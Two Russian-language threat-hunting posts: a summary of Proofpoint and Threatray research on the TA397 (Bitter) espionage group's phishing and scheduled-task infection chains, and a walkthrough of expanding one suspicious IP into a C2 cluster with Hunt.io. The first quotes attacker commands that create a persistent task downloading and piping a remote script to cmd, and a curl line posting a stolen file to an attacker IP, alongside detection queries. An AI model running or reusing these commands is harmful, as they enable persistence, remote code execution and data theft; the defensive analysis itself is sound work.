🧵 TA397 (Bitter)

📌 Новый отчёт от Proofpoint и Threatray раскрывает, как на протяжении 8 лет предположительно индийская APT-группа TA397 ведёт разведку против дипмиссий, правительств и оборонных структур в Европе и Азии.

TA397 will frequently target organizations and entities in Europe that have interests or a presence in China, Pakistan, and other neighboring countries on the Indian subcontinent.  

☕ Немного контекста
Группа давно известна под именем Bitter и подозревается в работе на индийские интересы. Но вместо сложных эксплойтов — ставка на точный фишинг и нестандартный подход к Scheduled Tasks.
Работают строго по графику — 9:00–17:00 по IST, как в офисе.

TA397’s hands-on-keyboard and infrastructure operations align with the standard working hours of the Indian Standard Time (IST) timezone. 

 

✉️ Входной вектор: дипломатия, CHM и .MSC
TA397 маскируются под посольства, министерства и оборонные ведомства. Темы писем максимально приближены к реальности:
"AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS"
"SituationNote : SouthKorea_Martial law"
"Note from Embassy of Mauritius"
"Key National Defense R&D Projects"
Вложения — RAR-архивы с .CHM, .LNK, .MSC. Изредка — IQY и Access DB.

⚙️ Цепочки заражения

🎣 Email → архив → файл → PowerShell → Scheduled Task → C2
Пример: MSC-файл запускает mmc.exe, который создаёт задачу через schtasks, использует conhost.exe и PowerShell

🔍 Команда, достойная отдельной кружки чая
"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm 'woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME' -OutFile 'kwe.cc'; Get-Content 'kwe.cc' | cmd"
Что тут:
ping → создаёт задержку
schtasks создаёт задачу
PowerShell качает скрипт, читает его и передаёт в cmd
📌 C2-запросы всегда включают COMPUTERNAME и USERNAME — иногда через *, .., --, ; и даже __ — чтобы запутать сигнатуры.

🎯 Ручной контроль
После успешной установки задачи, TA397 ждут, и только если цель «интересна», загружают RAT (например, Demon Agent или BDarkRAT). Примеры активности:
curl -X POST -F "file=@C:\\programdata\\abc1.pdf" http://1.1.1[.]1/svupfl.php?oi=HOST_USER
Собирают systeminfo, tasklist, wmic
Иногда монтируют удалённую шару \\IP\tempy, откуда грузят RAT’ы (wmRAT, MiyaRAT)
Упаковка PE-файлов вручную: sh1.txt + sh2.txt = shh.exe

🧠 Детект
1. conhost в headless-режиме
event_type: "processcreatewin"
AND proc_file_name: "conhost.exe"
AND cmdline: "headless"
2. PowerShell → Get-Content → cmd
event_type: "processcreatewin"
AND proc_file_name: "powershell.exe"
AND cmdline: ("get-content" AND "cmd")
3. C2-сервер с Let’s Encrypt + PHP endpoint + имя машины
https://domain[.]com/sdf.php?fv=HOST*USER


Весь материал в пост не уместить, поэтому к прочтению:
🔗 https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one
🔗 https://www.threatray.com/blog/the-bitter-end-unraveling-eight-years-of-espionage-antics-part-two
🦔 THF

🕵️ Как из одного IP вытянуть больше информации

Во время TH или анализа инцидента часто всё начинается с одного объекта — подозрительного IP-адреса/домена. Но за ним может стоять целый кластер C2, фишинговых доменов и прокси.

📦 Что делать дальше?
Провести инфраструктурную разведку: поиск связей, повторно используемых конфигураций и других узлов.

🛠 Часть полезных инструментов:
▪️ Whois / Passive DNS
▪️ Shodan, Censys
▪️ VirusTotal, AbuseIPDB
▪️ Hunt.io

🔍 Сегодня рассмотрим пример Hunt.io
1. Старт с IP
Адрес 168.100.9[.]71 всплыл в фиде/иницденте как подозрительный.
2. Базовая инфа
📍 Хостинг: BL Networks (анонимные VPS)
📛 Домен: btc-winnings-made[.]com → намёк на криптоскам
📌 Один домен на IP → не shared-хостинг → признак выделенного C2
3. Порты и сервисы
Открыты 22 (SSH), 80, 443.
Nginx, ответ на 443 — 404 с заглушкой.
⚠️ Признаков Cobalt Strike или чего-то редкого — нет.
4. Сертификаты
🔐 Self-signed, CN = localhost, Issuer = Internet Widgits Pty Ltd
🧬 Используем JA4X фингерпринт → ищем похожие конфигурации
5. SQL-поиск в Hunt
По JA4X найдено всего 6 хостов → высокая уникальность → можно связывать в одну группу.
6. Проверка в VirusTotal
Часть адресов детектится, есть упоминание Latrodectus (модульная малварь).
Изолированный IP оказался частью скрытой инфраструктуры.

✔️ Из одного IP получен кластер из нескольких C2-хостов
✔️ Методика применима для охоты на инфраструктуру до компрометации
✔️ Позволяет строить детект на основе поведения: VPS-провайдер, TLS-паттерны, конфигурации, а не конкретные адреса

🔗https://hunt.io/blog/practical-guide-unconvering-malicious-infrastructure
🦔 THF